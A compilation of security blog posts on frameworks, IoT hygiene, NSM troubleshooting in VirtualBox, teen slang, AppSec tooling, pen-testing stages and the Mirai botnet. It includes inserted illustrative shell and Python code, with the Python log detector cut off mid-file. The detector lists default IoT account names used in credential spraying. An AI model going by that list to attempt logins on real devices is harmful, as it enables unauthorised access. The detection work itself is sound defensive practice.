When it comes to selecting a security framework as a CISO, I lean towards the NIST Cyber Security Framework (CSF) pictured below. This framework is comprehensive, and provides a scoring model that allows risk owners to measure and target what risk level they believe they need to achieve based on their business model, threat profile, and risk tolerance. It has five functional focus areas. The ISO 27001 framework is also a very solid and frequently used model. Both of these frameworks can result in a Certificate of Attestation demonstrating adherence to the standard. Many commercial corporations do an annual ISO 27001 assessment for that very reason. More and more are leaning towards the NIST CSF, especially commercial corporations doing work with the government.

The art in cyber security is in the interpretation of the rules, standards, and requirements that are primarily based on a foundation in science in some form. The more experience one has in the cyber security industry, the more effective the art becomes. As a last thought, keep in mind that Connection’s Technology Solutions Group Security Practice has over 150 years of cyber security expertise on tap to apply to that art.

The post Cyber Security: Three Parts Art, One Part Science appeared first on Connected.

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that didn’t contain some form of smart device. From digital assistants to smart plugs, with more endpoints comes more avenues bad actors can use to access home networks. As recently as 2018, virtual assistants, smart TVs, and even smart plugs appeared secure on the surface but were found to have security flaws that could facilitate home network exposures by bad actors in the future. Some IoT devices were actually used to conduct botnet attacks, including an IoT thermometer and home Wi-Fi routers.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in an advanced internet router that has built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

Troubleshooting NSM Virtualization Problems with Linux and VirtualBox

I spent a chunk of the day troubleshooting a network security monitoring (NSM) problem. I thought I would share the problem and my investigation in the hopes that it might help others. The specifics are probably less important than the general approach.

It began with ja3. You may know ja3 as a set of Zeek scripts developed by the Salesforce engineering team to profile client and server TLS parameters.

I was reviewing Zeek logs captured by my Corelight appliance and by one of my lab sensors running Security Onion. I had coverage of the same endpoint in both sensors.

I noticed that the SO Zeek logs did not have ja3 hashes in the ssl.log entries. Both sensors did have ja3s hashes. My first thought was that SO was misconfigured somehow to not record ja3 hashes. I quickly dismissed that, because it made no sense. Besides, verifying that intuition required me to start troubleshooting near the top of the software stack.

I decided to start at the bottom, or close to the bottom. I had a sinking suspicion that, for some reason, Zeek was only seeing traffic sent from remote systems, and not traffic originating from my network. That would account for the creation of ja3s hashes, for traffic sent by remote systems, but not ja3 hashes, as Zeek was not seeing traffic sent by local clients.

I was running SO in VirtualBox 6.0.4 on Ubuntu 18.04. I started sniffing TCP network traffic on the SO monitoring interface using Tcpdump. As I feared, it didn't look right. I ran a new capture with filters for ICMP and a remote IP address. On another system I tried pinging the remote IP address. Sure enough, I only saw ICMP echo replies, and no ICMP echoes. Oddly, I also saw doubles and triples of some of the ICMP echo replies. That worried me, because unpredictable behavior like that could indicate some sort of software problem.

My next step was to "get under" the VM guest and determine if the VM host could see traffic properly. I ran Tcpdump on the Ubuntu 18.04 host on the monitoring interface and repeated my ICMP tests. It saw everything properly. That meant I did not need to bother checking the switch span port that was feeding traffic to the VirtualBox system.

It seemed I had a problem somewhere between the VM host and guest. On the same VM host I was also running an instance of RockNSM. I ran my ICMP tests on the RockNSM VM and, sadly, I got the same one-sided traffic as seen on SO.

Now I was worried. If the problem had only been present in SO, then I could fix SO. If the problem was present in both SO and RockNSM, then the problem had to be with VirtualBox -- and I might not be able to fix it.

I reviewed my configurations in VirtualBox, ensuring that the "Promiscuous Mode" under the Advanced options was set to "Allow All". At this point I worried that there was a bug in VirtualBox. I did some Google searches and reviewed some forum posts, but I did not see anyone reporting issues with sniffing traffic inside VMs. Still, my use case might have been weird enough to not have been reported.

I decided to try a different approach. I wondered if running VirtualBox with elevated privileges might make a difference. I did not want to take ownership of my user VMs, so I decided to install a new VM and run it with elevated privileges.

Let me stop here to note that I am breaking one of the rules of troubleshooting. I'm introducing two new variables, when I should have introduced only one. I should have built a new VM but run it with the same user privileges with which I was running the existing VMs.

I decided to install a minimal edition of Ubuntu 9, with VirtualBox running via sudo. When I started the VM and sniffed traffic on the monitoring port, lo and behold, my ICMP tests revealed both sides of the traffic as I had hoped. Unfortunately, from this I erroneously concluded that running VirtualBox with elevated privileges was the answer to my problems.

I took ownership of the SO VM in my elevated VirtualBox session, started it, and performed my ICMP tests. Womp womp. Still broken.

I realized I needed to separate the two variables that I had entangled, so I stopped VirtualBox, and changed ownership of the Debian 9 VM to my user account. I then ran VirtualBox with user privileges, started the Debian 9 VM, and ran my ICMP tests. Success again! Apparently elevated privileges had nothing to do with my problem.

By now I was glad I had not posted anything to any user forums describing my problem and asking for help. There was something about the monitoring interface configurations in both SO and RockNSM that resulted in the inability to see both sides of traffic (and avoid weird doubles and triples).

I started my SO VM again and looked at the script that configured the interfaces. I commented out all the entries below the management interface as shown below.

$ cat /etc/network/interfaces

# This configuration was created by the Security Onion setup script.
#
# The original network interface configuration file was backed up to:
# /etc/network/interfaces.bak.
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# loopback network interface
auto lo
iface lo inet loopback

# Management network interface
auto enp0s3
iface enp0s3 inet static
  address 192.168.40.76
  gateway 192.168.40.1
  netmask 255.255.255.0
  dns-nameservers 192.168.40.1
  dns-domain localdomain

#auto enp0s8
#iface enp0s8 inet manual
#  up ip link set $IFACE promisc on arp off up
#  down ip link set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -K $IFACE $i off; done
#  post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6

#auto enp0s9
#iface enp0s9 inet manual
#  up ip link set $IFACE promisc on arp off up
#  down ip link set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -K $IFACE $i off; done
#  post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6

I rebooted the system and brought the enp0s8 interface up manually using this command:

$ sudo ip link set enp0s8 promisc on arp off up

Fingers crossed, I ran my ICMP sniffing tests, and voila, I saw what I needed -- traffic in both directions, without doubles or triples no less.

So, there appears to be some sort of problem with the way SO and RockNSM set parameters for their monitoring interfaces, at least as far as they interact with VirtualBox 6.0.4 on Ubuntu 18.04. You can see in the network script that SO disables a bunch of NIC options. I imagine one or more of them is the culprit, but I didn't have time to work through them individually.

I tried taking a look at the network script in RockNSM, but it runs CentOS, and I'll be darned if I can't figure out where to look. I'm sure it's there somewhere, but I didn't have the time to figure out where.

The moral of the story is that I should have immediately checked after installation that both SO and RockNSM were seeing both sides of the traffic I expected them to see. I had taken that for granted for many previous deployments, but something broke recently and I don't know exactly what. My workaround will hopefully hold for now, but I need to take a closer look at the NIC options because I may have introduced another fault.

A second moral is to be careful of changing two or more variables when troubleshooting. When you do that you might fix a problem, but not know what change fixed the issue.
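The post-installation check the author says he should have run, as an added example that is not part of the original post: it summarises an ICMP capture from the monitoring interface and reports whether both directions are visible and whether any packet shows up doubled or tripled. The interface name enp0s8, the remote host 192.0.2.10 and the tcpdump lines inside the script are constructed for illustration.

```shell
#!/bin/sh
# Added example, not code from the original post: verify that a sensor's
# monitoring interface sees BOTH directions of traffic, and flag the
# duplicate packets the post describes. Interface name, remote host and
# the tcpdump lines below are constructed/hypothetical.

# Summarise ICMP lines as printed by `tcpdump -nn icmp` (read from stdin).
# Output: requests=<n> replies=<n> dups=<n> verdict=<ok|one-sided|dups>
# "dups" counts extra copies of a packet: lines identical once the
# timestamp (first field) is stripped, which is how doubled and tripled
# echo replies show up in a capture.
summarize_icmp() {
  awk '
    BEGIN { req = 0; rep = 0 }
    /ICMP echo request/ { req++ }
    /ICMP echo reply/   { rep++ }
    {
      key = $0
      sub(/^[^ ]+ /, "", key)   # drop the timestamp
      seen[key]++
    }
    END {
      dups = 0
      for (k in seen) if (seen[k] > 1) dups += seen[k] - 1
      verdict = "ok"
      if (req == 0 || rep == 0) verdict = "one-sided"
      else if (dups > 0) verdict = "dups"
      printf "requests=%d replies=%d dups=%d verdict=%s\n", req, rep, dups, verdict
    }'
}

# Live check: capture a handful of ICMP packets for one remote host on the
# monitoring interface while that host is pinged from another machine.
# usage: capture_icmp <iface> <remote_ip> [count]
capture_icmp() {
  sudo timeout 30 tcpdump -nni "$1" -c "${3:-20}" icmp and host "$2" 2>/dev/null
}

# Show the NIC offload features the Security Onion interface script turns
# off, so they can be re-enabled one at a time when hunting the culprit.
# usage: show_offloads <iface>
show_offloads() {
  sudo ethtool -k "$1" | grep -E 'checksumming|scatter-gather|segmentation-offload|receive-offload'
}

# Constructed sample: healthy capture, both directions, no duplicates.
SAMPLE_OK="12:00:01.000100 IP 192.168.40.50 > 192.0.2.10: ICMP echo request, id 4242, seq 1, length 64
12:00:01.020100 IP 192.0.2.10 > 192.168.40.50: ICMP echo reply, id 4242, seq 1, length 64
12:00:02.000100 IP 192.168.40.50 > 192.0.2.10: ICMP echo request, id 4242, seq 2, length 64
12:00:02.020100 IP 192.0.2.10 > 192.168.40.50: ICMP echo reply, id 4242, seq 2, length 64"

# Constructed sample: what the post describes inside the VM: replies only,
# with one reply doubled and another tripled.
SAMPLE_BROKEN="12:00:01.020100 IP 192.0.2.10 > 192.168.40.50: ICMP echo reply, id 4242, seq 1, length 64
12:00:01.020150 IP 192.0.2.10 > 192.168.40.50: ICMP echo reply, id 4242, seq 1, length 64
12:00:02.020100 IP 192.0.2.10 > 192.168.40.50: ICMP echo reply, id 4242, seq 2, length 64
12:00:02.020150 IP 192.0.2.10 > 192.168.40.50: ICMP echo reply, id 4242, seq 2, length 64
12:00:02.020200 IP 192.0.2.10 > 192.168.40.50: ICMP echo reply, id 4242, seq 2, length 64
12:00:03.020100 IP 192.0.2.10 > 192.168.40.50: ICMP echo reply, id 4242, seq 3, length 64"

# Offline demo on the constructed samples.
printf '%s\n' "$SAMPLE_OK"     | summarize_icmp
printf '%s\n' "$SAMPLE_BROKEN" | summarize_icmp

# Live run against a real sensor (needs root and tcpdump), e.g.
#   RUN_LIVE=1 MON_IF=enp0s8 REMOTE=192.0.2.10 sh check_monitor.sh
if [ "${RUN_LIVE:-0}" = "1" ]; then
  capture_icmp "${MON_IF:-enp0s8}" "${REMOTE:-192.0.2.10}" | summarize_icmp
  show_offloads "${MON_IF:-enp0s8}"
fi
```

A "one-sided" verdict on a fresh sensor points below Zeek (VM networking, span port, interface script), which is where the post ended up looking.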

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

12 ways IT can create business value in 2019

With technology today’s fuel for business transformation, IT leaders are increasingly seen as key players in companies’ quests to bolster their bottom lines. But with so many new technologies and management approaches emerging, where should IT leaders put their focus?

We asked a range of tech leads what they’re planning this year and how those initiatives can best be approached to add value to their organizations, based on business priorities. Some involve embracing emerging technologies for improved workflows and products; others involve new approaches to how work gets done.   

Here’s what tech leaders think should be top of mind for creating value in 2019.


Teen Texting Slang (and Emojis) Parents Should Know

What adults call texting, kids call talking. They “talk” on their phones via chat, social comments, snaps, posts, tweets, and direct messages. And they are talking most of the time — tap, tap, tap — much like background music. In all this “talking” a language, or code, emerges just as it has for every generation only today that language is in acronyms, hashtags, and emojis. And while the slang is perfectly understood peer-to-peer, it has parents googling like crazy to decipher it.

And this language changes all the time. It expands, contracts, and specific acronyms and symbols (emojis) can change in meaning entirely over time, which is why we update this list periodically.

This time we’ve added emojis (scroll to bottom) since those powerful little graphic symbols have singlehandedly transformed human communication, as we know it.

Harmless Banter

We publish this list with an important reminder: Teen texting slang isn’t inherently bad or created with an intent to deceive or harm. Most of the terms and symbols have emerged as a kind of clever shorthand for fast moving fingers and have no dangerous or risky meaning attached. So, if you are monitoring your kids’ phones or come across references you don’t understand, assume the best in them (then, of course, do your homework).

For example, there are dozens of harmless words such as finna (fixing to do something), yeet (a way to express excitement), skeet (let’s go), Gucci (great, awesome, or overpriced), AMIRITE (am I right?), QQ4U (quick question for you), SMH (shaking my head), bread (money), IDRK (I don’t really know), OOTD (outfit of the day), LYAAF (love you as a friend), MCE (my crush everyday), HMU (hit me up, call me), W/E (whatever), AFK (away from keyboard), RTWT (read the whole thread), CWYL (chat with you later), Ship (relationship), CYT (see you tomorrow) or SO (significant other).

The Red Flags 

Here are some terms and emojis that may not be so innocent. Any of these terms can also appear as hashtags if you put a # symbol in front of them.

Potential bullying slang

Ghost = to ignore someone on purpose

Boujee = rich or acting rich

Sip tea = mind your own business

The tea is so hot = juicy gossip

AYFKM? = are you f***ing kidding me?

Thirsty = adjective describing a desperate-acting, needy person

Basic = annoying person, interested in shallow things

Extra = over the top, excessive, dramatic person

TBH = to be honest (sometimes followed by negative comments)

Zerg = to gang up on someone (a gaming term that has morphed into a bullying term)

KYS = kill yourself

SWYP = so what’s your problem?

182 = I hate you

Curve = to reject someone

Shade = throwing shade, to put someone down.

POS = piece of sh**

WTF = what the f***

Derp = stupid

Lsr = loser

Butters = ugly

Jelly = jealous

Subtweet = talking about someone but not using their @name

Bizzle = another word for b***h

THOT or thotties = a promiscuous girl/s

YAG = you are gay

Cyber pretty = saying someone only looks good online with filters

Beyouch = another word for b***h

RAB = rude a** b***h

IMHO = in my honest opinion

IMNSHO = in my not so honest opinion

NISM = need I say more?

Potential risky behavior slang  

Broken = hung over

Pasted = high or drunk

Belfie = self-portrait (selfie) featuring the buttocks

OC = open crib, party at my house

PIR = parents in the room

9, CD9, Code 9 = parents here

99 = parents gone

Smash = to have casual sex

Slide into my DM = connecting through a direct message on a social network with sexual intentions

A3 = anytime, anywhere, anyplace

WTTP = want to trade pictures?

S2R = send to receive (pictures)

Sugarpic = refers to a suggestive or erotic photograph

TDTM = talk dirty to me

KMS = kill myself

AITR = adults in the room

KPC = keeping parents clueless

1174 = invite to a wild party usually followed by an address

53X = sex

Chirped = got caught

Cu46 = see you for sex

LMIRL = let’s meet in real life

GNRN = get naked right now

Pron = porn

Frape = Facebook rape; posting to someone else’s profile when they leave it logged in.

NSFW = not safe for work (post will include nudity, etc)

Livingdangerously = taking selfies while driving or some other unsafe behavior

Kik = let’s talk on kik instant message instead

Sue = suicide

Dep = depression

Svv = self- harming behavior

SN = send nudes

Nend sudes = another way to say SN/send nudes

PNP = party and play (drugs + sex)

 

Potential drug-related slang

420, bud, tree = marijuana

Blow, mayo, white lady, rock, snow, yay, yale, yeyo, yank, yahoo = Cocaine

Special K = ketamine, liquid tranquilizer

Pearls = a nicely rolled blunt

Dabbing = concentrated doses of marijuana (began as a dance craze)

DOC = drug of choice

Turnt up / turnt = high or drunk

Geeked up = being high

Bar = Xanax pill

Bar out = to take a Xanax pill

Baseball = crack cocaine

Skrill = Money

Bread = money

CID = acid

E, XTC  = ecstasy

Hazel = heroin

Blue Boogers = snorting Adderall or Ritalin

Pharming = getting into medicine cabinets to find drugs to get high

Oxy, perks, vikes = opioids

Robo-tripping = consuming cough syrup to get high

Tweaking = high on amphetamines

Wings = cocaine; heroin

Speed, crank, uppers, Crystal or Tina = meth

 

Red flag emojis

Frog = an ugly person

Frog + tea (coffee) cup = that’s the tea (gossip)

Any kind of green plant/leaves = marijuana

Maple leaf = marijuana

Broccoli = marijuana

Smoke puff or gasoline = get high

Snowflake = cocaine

Person skiing = cocaine

Pill = ecstasy or MDMA for sale

Face with steam from nose = MDMA drug

Rocket = high potency drug for sale

Syringe = heroin

Diamond = crystal meth, crack cocaine for sale

Skull = die

Knife + screaming face = calling someone a psycho

Bowling ball + person running = I’m gonna hit you, coming for you

Flowers = drugs

Dollar sign = it’s for sale

Syringe = heroin (also tattoo)

Cat with heart eyes = sex

Purple face with horns = sex

Gas pump = sex

Tongue, eggplant, water drops, banana, peach, taco, cherries, drooling face, rocket = sex

Rose, rosette, cherry, pink cherry blossom, growing heart, airplane, crown = emojis that refer to sex trafficking

When it comes to figuring out what your kids are up to online, using your own instincts and paying attention will be your best resources. If something doesn’t sound or look right on your child’s phone trust that feeling and look deeper. You don’t have to know every term or symbol — the more important thing is to stay aware and stay involved.

The post Teen Texting Slang (and Emojis) Parents Should Know appeared first on McAfee Blogs.

A Deeper Look at Gartner’s Hype Cycle for Application Security

The application security market is ever-changing, with new technologies emerging on a continuous basis. One helpful way to stay on top of the AppSec market is Gartner’s most recent Hype Cycle for Application Security, 2018.

When it comes to DevSecOps, Gartner notes that “adoption is slow, but interest is high,” and showcases development’s shift towards DevOps environments in the name of speed and agility. DevOps is great for an organization, but not if the security piece is siloed and acts in a way that disrupts the speed of development. This is why, Gartner points out, “Security must be a part of this shift, but in a way that respects the collaborative nature of DevOps.”

Veracode’s own Tim Jarrett, Director of Product Management, recently attended DevSecOps Days as part of this year’s RSA Conference, and took away some valuable points on trends in DevSecOps. The general overview was that the theory of DevOps is fantastic, but the practice itself isn’t as straightforward, which is why it makes sense that DevSecOps is catching on in theory, but remains aspirational in practice. This might seem like a bump in the road of progression, but DevSecOps can be successful if security teams are able to communicate the definitive business value.

Read more about Tim’s DevSecOps Days takeaways here.

Software composition analysis

According to Gartner, “Software Composition Analysis is expected to reach the ‘Plateau of Productivity’ in two to five years.” This is supported by the fact that SCA has become more of a mainstream technology that vendors offer as a part of their solution suites. The surge of SCA offerings from software security vendors essentially began when attention was called to the widespread impact of software vulnerabilities like Heartbleed and Apache Struts.

The need for a solution that could analyze open source components was only furthered by the widespread use of open source code and the rampant amount of vulnerabilities that came along with such components. Veracode’s own State of Software Security Report Vol. 9 reported that in last year alone, 87.5% of Java applications contained a component with at least one vulnerability.

In addition to recommending that organizations use SCA tools on a regular basis to ensure software security, Gartner also stated that “SCA tools fit well within DevSecOps-style workflows, where scanning can be automated as part of the rapid development processes.”

Get the State of Software Security Volume 9 Software Composition Analysis Infosheet here.

Application security testing suites

Application security testing suites are a consolidation of AST technologies, including – but not limited to – static analysis, dynamic analysis, software composition analysis, and secure code training to more effectively verify the security of a company’s codebase.

To cover all of your bases when it comes to application security, one option is to use multiple vendors so that you have access to the “best-of-breed” technologies in each category. However, Gartner points out the downside to this approach; “the requirement to deal with different systems, separate dashboards,” and a not-really-unified approach. “Rather than engaging multiple vendors, Gartner clients have increasingly been seeking ‘one-stop-shop’ vendors that offer multiple technologies in a single platform with flexible deployment options.”

Veracode is one of those “one-stop-shops,” and can provide visibility into application status across all testing types, including SAST, DAST, SCA, and manual penetration testing in one centralized view. To learn more about Veracode’s comprehensive AppSec platform, check out this Platform Overview eBook, or, schedule a demo to see how we can help your specific organization.

 

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner, Hype Cycle for Application Security, 2018, 27 July 2018, Ayal Tirosh

Six Stages of Penetration Testing


Through penetration testing, you can proactively identify the most exploitable security weaknesses before someone else does. However, there’s a lot more to it than the actual act of infiltration. Pen testing is a thorough, well thought out project that consists of several phases. Read on to learn about what it takes to complete a successful pen test.

Planning and Preparation

Many old adages proclaim the import of preparation, and when it comes to penetration testing, planning is indeed the key to success. There are multiple ways to approach a pen test and figuring out your goals and scoping accordingly is key to ensuring that you’re going to get the most out of the process. Consider these questions to ensure your expectations are aligned with the testers and you get the information you’re looking for.

  • Do you want an external test, which simulates an attack from an outside individual or organization, or an internal test, which simulates an attack from an insider, or an attacker that has a foothold within the organization?
  • Would you prefer your security team to know a pen test is about to be performed, or would you rather it be performed covertly to identify their effectiveness in detecting the activity?
  • How much information do you want to share with the pen testers beforehand?
  • How aggressive are the pen testers allowed to be?

 

Discovery

Once the scope has been established, pen testing teams can get to work. In this discovery phase, teams perform different types of reconnaissance on their target. On the technical side, information like IP addresses can help determine information about firewalls and other connections. On the personal side, data as simple as names, job titles, and email addresses can hold great value. Attackers can use this data to send phishing emails or figure out who may have privileged credentials, with which they can get full access to the environment.

Additionally, before exploiting a system, pen testing teams must look for weaknesses within the environment. Often referred to as footprinting, this phase of discovery involves gathering as much information about the target systems, networks, and their owners as possible without attempting to penetrate them. An automated scan is one technique that can be used to search for vulnerabilities that can be used as a doorway.

Penetration Attempt and Exploitation

Now informed about their target, pen testers can begin using these newly discovered entry points, testing all of the weaknesses they discovered. They will attempt to enter the target through these identified entry points.

But pen testers will do far more than just attempt to gain access. Once inside a compromised system, they will try to elevate their access privileges within the environment, allowing them to take any number of additional actions. Gaining administrative privileges enables pen testers to identify security weaknesses in other areas and resources, like poor configuration, unguarded access to sensitive data, or ineffective management of accounts and passwords.

Additionally, multiple types of assets can be tested. In addition to the on-premise network infrastructure and workstations you’d expect could be vulnerable to attack, mobile devices, web applications, and even IoT devices like security cameras, can also be put to the test.

Analysis and Reporting

Pen testers should carefully track everything they do during the discovery and exploitation process. From there, they can create a report that includes all of these details, highlighting what was used to successfully penetrate the system, what security weaknesses were found, and any other pertinent information discovered.

These reports should also include analysis to help map out next steps once the test has concluded. Pen testing teams can help determine the highest priority items that an organization should take care of as soon as possible, as well as suggestions for remediation methods.

Clean Up and Remediation

Just as with a real attack, pen testers can leave “footprints.” It’s critical to go back through systems and remove any artifacts used during the test, since they could be leveraged in the future by someone with nefarious intentions. Once this is completed, an organization can go about the business of fixing the security weaknesses discovered and prioritized during the testing phase. This may include putting compensating controls in place to protect weaknesses that cannot be easily remediated, or even investing in new solutions that can streamline security and improve efficiency.

Retest

Penetration tests can and should be utilized frequently, especially when new applications or infrastructure are being deployed. Even if your organization believes they resolved every weakness listed in a previous report, the best way to ensure your remediations are effective is to test again. Additionally, IT environments, and the methods used to attack them, are constantly evolving, so it is to be expected that new weaknesses will emerge.

With so many breaches dominating the news, it’s more critical than ever to reduce the chance that an incident could put your organization’s reputation and trustworthiness at stake. Organizations should do everything they can to understand and avoid behaviors that put them at risk. Pen testing is an essential part of a risk assessment strategy and helps ensure that your organization is reducing the chance of a damaging breach occurring within your environment.

Read our guide to learn how you can get smarter about penetration testing.


Teaching Old Malware New Tricks: How the Latest Mirai Variant Targets New Devices

Though initially created to give players of the game Minecraft an advantage, the Mirai malware strain has since been responsible for a number of notable distributed denial of service (DDoS) attacks, including the one suffered by DNS provider Dyn, which resulted in outages for numerous Internet platforms. Before its creators were caught and prosecuted, they posted the source code online, allowing Mirai to take on a life of its own. Mirai has now reemerged, enhanced and ready to cause more damage. Read on to learn how Mirai works, what its newest features are, and how you can protect your organization from this destructive malware strain.


What is a Botnet?

Mirai operates by breaching Linux devices and building botnets. This type of malware works by having its controlling system, known as the bot herder or bot master, infect and remotely control any kind of device – from a smartphone to a security camera. Using this command-and-control technique (C&C or C2), it instructs the breached device to run a bot, a software application that executes automated scripts to perform tasks over the Internet. Once the bot herder has taken control of multiple devices, often numbering into the hundreds or thousands, it uses this cluster of bots, known as a botnet, to run more sophisticated, malicious tasks.

Most commonly, botnets are used in DDoS attacks, like the Dyn incident mentioned above. With so many bots under their control, an attacker can have all of them send requests to a targeted system, flooding it with traffic, blocking out any legitimate requests. Eventually, this influx of traffic will overwhelm a system, causing it to crash.

 
Brand New Enterprise Exploits

Mirai has resurfaced a few times since its initial foray onto the scene. Since the code is now freely available, changes can be made at the whim of any malicious actor. For example, in early 2018, one successor used its botnet to steal cryptocurrency from computers dedicated to cryptocurrency mining.

Now Mirai has rematerialized once more, with this variant updated to target eleven additional devices. A few of the new targets, such as WePresent wireless presentation systems and LG Supersign TVs, are devices intended for use by enterprise organizations. This pivot into business-class devices should put businesses on their guard, since it gives attackers a window into organizational networks for additional exploitation. It also signals a pivot toward loftier end goals, since devices connected to these enterprise networks give threat actors even more bandwidth to use in their botnet attacks.


Same Old Mirai Infrastructure

Mirai isn’t a particularly complex piece of malware – which is dangerous in its own right, as it gives far more people the opportunity to use it. Ultimately, its success lies in its exploitation of the weak security that plagues most IoT devices.

Mirai’s bot master directs its controlled devices to continuously scan the Internet for the IP addresses of IoT devices. From there, it works through a list of default usernames and passwords to attain administrative access to the device. Given Mirai’s numerous successful attacks, a worrisomely large number of devices still have these credentials in place.

This strategy would be far less frequently successful on traditional workstations and servers within an organization. First, they are far more likely to have policies in place requiring frequent password changes, multi-factor authentication, or even identity and access management solutions to ensure that administrative access isn’t so easily acquired.

Moreover, most antivirus solutions for workstations or servers would be able to spot these simplistic breach attempts and stop them in their tracks. Unfortunately, nearly all IoT devices still lack antivirus solutions, making them a prime target for techniques that are no longer as common on workstations or network servers.

Finally, IoT devices are ideal because most of them are constantly connected to the internet and are owned or operated by users who are unaware of the security risks that these devices can pose.
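The spray of vendor-default usernames described above leaves a recognisable footprint in the login logs of the devices it touches: one source trying a handful of well-known account names against many different hosts within seconds. The following is an added example, not code from the original post or from any vendor, that parses a few constructed telnet login records and flags sources matching that pattern. The log layout, the IP addresses (taken from documentation ranges) and the short list of default account names are all constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telnet login records in a syslog-like layout (not real logs).
# Format: <ISO timestamp> telnetd[<pid>]: login <result> for user '<user>' from <src> on <dst>
SAMPLE_LOGS = """\
2019-04-02T03:14:07Z telnetd[412]: login failed for user 'root' from 203.0.113.7 on 192.0.2.10
2019-04-02T03:14:08Z telnetd[412]: login failed for user 'admin' from 203.0.113.7 on 192.0.2.10
2019-04-02T03:14:09Z telnetd[413]: login failed for user 'root' from 203.0.113.7 on 192.0.2.11
2019-04-02T03:14:10Z telnetd[414]: login failed for user 'admin' from 203.0.113.7 on 192.0.2.12
2019-04-02T03:14:11Z telnetd[415]: login failed for user 'support' from 203.0.113.7 on 192.0.2.13
2019-04-02T03:14:12Z telnetd[416]: login succeeded for user 'admin' from 203.0.113.7 on 192.0.2.14
2019-04-02T03:20:00Z telnetd[420]: login failed for user 'jsmith' from 198.51.100.5 on 192.0.2.10
2019-04-02T03:20:30Z telnetd[421]: login succeeded for user 'jsmith' from 198.51.100.5 on 192.0.2.10
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) telnetd\[\d+\]: login (?P<result>failed|succeeded) "
    r"for user '(?P<user>[^']*)' from (?P<src>\S+) on (?P<dst>\S+)$"
)

# Illustrative subset of account names commonly shipped as vendor defaults on IoT gear.
# A constructed list for this example, not a complete or authoritative one.
DEFAULT_USERS = {"root", "admin", "support", "user", "guest", "service"}


def parse(log_text):
    """Turn matching log lines into dicts with a real datetime in 'ts'."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated line: skip rather than fail
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(d)
    return events


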